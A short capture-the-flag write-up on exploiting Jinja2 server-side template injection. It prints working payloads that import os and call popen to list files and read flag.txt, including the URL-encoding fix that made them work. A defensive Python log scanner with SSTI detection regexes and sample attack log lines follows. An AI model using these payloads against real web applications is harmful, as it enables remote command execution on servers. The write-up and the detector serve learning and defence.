Can you exploit this simple mistake?
An easy challenge; I struggled with the #SSTI part as I wasn't encoding the command properly. Using Burp Suite to make it easier to manipulate the URL, I first tried:
`{{request.application.__globals__.__builtins__.__import__('os').popen("ls").read()}}`
This got me the listing of the folder, which contained a flag.txt file. I then tried to read that file with cat:
`{{request.application.__globals__.__builtins__.__import__('os').popen("cat flag.txt").read()}}`
This resulted in a server error. I then tried several other types of injection, but none of them worked, until I remembered that the space in the cat command was probably causing the problem and had to be URL-encoded:
`{{request.application.__globals__.__builtins__.__import__('os').popen("cat%20flag.txt").read()}}`
This prints the flag on the page.
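As an added defensive example (not part of the original writeup): a stdlib-only Python log scanner that percent-decodes query parameters, including double-encoded ones, before looking for Jinja2 template delimiters, dunder attribute access and OS-execution calls. The log lines are constructed samples; the second carries the encoded form of the payload above, and the last shows that a URL-encoded space on its own is not an indicator.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not from the original post); the second
# line carries the percent-encoded form of the post's Jinja2 payload.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /?name=%7B%7Brequest.application.__globals__.__builtins__.__import__(%27os%27).popen(%22ls%22).read()%7D%7D HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:12:00:09 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 514
10.0.0.9 - - [01/Jan/2024:12:00:12 +0000] "GET /search?q=cat%20flag.txt HTTP/1.1" 404 128
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Each indicator is a cheap regex applied to the fully decoded parameter value.
INDICATORS = {
    "template_delimiter": re.compile(r"\{\{|\{%"),
    "dunder_access": re.compile(r"__[a-z]+__"),
    "os_exec": re.compile(r"\b(?:popen|system|subprocess|__import__)\b"),
}


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %257B%257B and %7B%7B both become {{."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def score_request_target(target: str) -> list[str]:
    """Return 'param:indicator' tags for every SSTI sign in the query string."""
    tags = []
    # parse_qsl already decodes one layer; fully_decode handles double-encoding.
    for key, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        tags.extend(f"{key}:{name}" for name, rx in INDICATORS.items() if rx.search(value))
    return tags


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, tags) for each logged request that looks like SSTI."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (tags := score_request_target(m.group(1))):
            hits.append((line.split(" ", 1)[0], tags))
    return hits
```

`scan_log(SAMPLE_LOG)` returns two hits, both from 10.0.0.7: the full payload trips all three indicators, while the `{{7*7}}` probe trips only the delimiter check.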